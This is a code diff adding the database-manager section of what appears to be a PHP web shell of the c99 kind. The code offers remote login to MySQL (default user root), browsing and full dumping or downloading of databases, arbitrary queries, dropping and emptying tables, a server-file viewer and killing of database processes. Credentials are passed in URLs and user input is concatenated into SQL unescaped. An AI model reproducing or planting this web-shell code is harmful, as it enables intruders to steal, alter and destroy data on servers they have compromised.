+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = true;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,strlen($sql_query)-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,strlen($sql_query)-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = false;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = true;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = true;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);     
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}     
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>»</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock); 
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
